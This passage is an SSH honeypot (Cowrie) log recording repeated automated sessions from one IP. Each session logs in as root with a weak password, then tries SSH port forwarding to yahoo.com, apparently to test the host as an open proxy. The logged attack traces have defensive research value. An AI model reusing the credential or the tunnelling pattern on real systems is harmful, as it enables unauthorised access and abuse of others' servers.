{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:58.909900Z","src_ip":"213.209.150.239","session":"1fa24aa6f1e2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":2497,"dst_ip":"1.2.3.4","dst_port":22,"session":"26f11c081102","protocol":"ssh","message":"New connection: 213.209.150.239:2497 (1.2.3.4:22) [session: 26f11c081102]","sensor":"my-vps","timestamp":"2025-08-26T00:58:58.955921Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:58.956755Z","src_ip":"213.209.150.239","session":"26f11c081102"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:59.003831Z","src_ip":"213.209.150.239","session":"26f11c081102"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:59.238264Z","src_ip":"213.209.150.239","session":"26f11c081102"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":1486,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:1486","sensor":"my-vps","timestamp":"2025-08-26T00:58:59.286352Z","session":"26f11c081102"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:59.334507Z","src_ip":"213.209.150.239","session":"26f11c081102"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":17041,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:17041","sensor":"my-vps","timestamp":"2025-08-26T00:58:59.473468Z","session":"26f11c081102"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:59.520596Z","src_ip":"213.209.150.239","session":"26f11c081102"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:59.568234Z","src_ip":"213.209.150.239","session":"26f11c081102"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":2548,"dst_ip":"1.2.3.4","dst_port":22,"session":"1378f8e9baa8","protocol":"ssh","message":"New connection: 213.209.150.239:2548 (1.2.3.4:22) [session: 1378f8e9baa8]","sensor":"my-vps","timestamp":"2025-08-26T00:58:59.614280Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:59.624142Z","src_ip":"213.209.150.239","session":"1378f8e9baa8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:59.661622Z","src_ip":"213.209.150.239","session":"1378f8e9baa8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:59.896099Z","src_ip":"213.209.150.239","session":"1378f8e9baa8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":20663,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:20663","sensor":"my-vps","timestamp":"2025-08-26T00:58:59.944718Z","session":"1378f8e9baa8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:59.991865Z","src_ip":"213.209.150.239","session":"1378f8e9baa8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":10851,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:10851","sensor":"my-vps","timestamp":"2025-08-26T00:59:00.137444Z","session":"1378f8e9baa8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:00.184679Z","src_ip":"213.209.150.239","session":"1378f8e9baa8"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:00.233235Z","src_ip":"213.209.150.239","session":"1378f8e9baa8"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":2588,"dst_ip":"1.2.3.4","dst_port":22,"session":"f92d52b359c5","protocol":"ssh","message":"New connection: 213.209.150.239:2588 (1.2.3.4:22) [session: f92d52b359c5]","sensor":"my-vps","timestamp":"2025-08-26T00:59:00.279454Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:00.280349Z","src_ip":"213.209.150.239","session":"f92d52b359c5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:00.327542Z","src_ip":"213.209.150.239","session":"f92d52b359c5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:00.562767Z","src_ip":"213.209.150.239","session":"f92d52b359c5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":14082,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:14082","sensor":"my-vps","timestamp":"2025-08-26T00:59:00.611268Z","session":"f92d52b359c5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:00.658925Z","src_ip":"213.209.150.239","session":"f92d52b359c5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":14139,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:14139","sensor":"my-vps","timestamp":"2025-08-26T00:59:00.793616Z","session":"f92d52b359c5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:00.840916Z","src_ip":"213.209.150.239","session":"f92d52b359c5"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:00.889181Z","src_ip":"213.209.150.239","session":"f92d52b359c5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":2632,"dst_ip":"1.2.3.4","dst_port":22,"session":"a23d2ff41498","protocol":"ssh","message":"New connection: 213.209.150.239:2632 (1.2.3.4:22) [session: a23d2ff41498]","sensor":"my-vps","timestamp":"2025-08-26T00:59:00.935050Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:00.936178Z","src_ip":"213.209.150.239","session":"a23d2ff41498"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:00.983092Z","src_ip":"213.209.150.239","session":"a23d2ff41498"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:01.218026Z","src_ip":"213.209.150.239","session":"a23d2ff41498"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":7521,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:7521","sensor":"my-vps","timestamp":"2025-08-26T00:59:01.266374Z","session":"a23d2ff41498"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:01.313723Z","src_ip":"213.209.150.239","session":"a23d2ff41498"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":7786,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:7786","sensor":"my-vps","timestamp":"2025-08-26T00:59:01.450027Z","session":"a23d2ff41498"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:01.497584Z","src_ip":"213.209.150.239","session":"a23d2ff41498"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:01.546298Z","src_ip":"213.209.150.239","session":"a23d2ff41498"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":2664,"dst_ip":"1.2.3.4","dst_port":22,"session":"052ba873ad4b","protocol":"ssh","message":"New connection: 213.209.150.239:2664 (1.2.3.4:22) [session: 052ba873ad4b]","sensor":"my-vps","timestamp":"2025-08-26T00:59:01.602024Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:01.603181Z","src_ip":"213.209.150.239","session":"052ba873ad4b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:01.659923Z","src_ip":"213.209.150.239","session":"052ba873ad4b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:01.943772Z","src_ip":"213.209.150.239","session":"052ba873ad4b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":26558,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:26558","sensor":"my-vps","timestamp":"2025-08-26T00:59:02.002274Z","session":"052ba873ad4b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:02.059656Z","src_ip":"213.209.150.239","session":"052ba873ad4b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":2140,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:2140","sensor":"my-vps","timestamp":"2025-08-26T00:59:02.214931Z","session":"052ba873ad4b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:02.272084Z","src_ip":"213.209.150.239","session":"052ba873ad4b"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:02.329876Z","src_ip":"213.209.150.239","session":"052ba873ad4b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":2722,"dst_ip":"1.2.3.4","dst_port":22,"session":"ebc64099779c","protocol":"ssh","message":"New connection: 213.209.150.239:2722 (1.2.3.4:22) [session: ebc64099779c]","sensor":"my-vps","timestamp":"2025-08-26T00:59:02.385532Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:02.386795Z","src_ip":"213.209.150.239","session":"ebc64099779c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-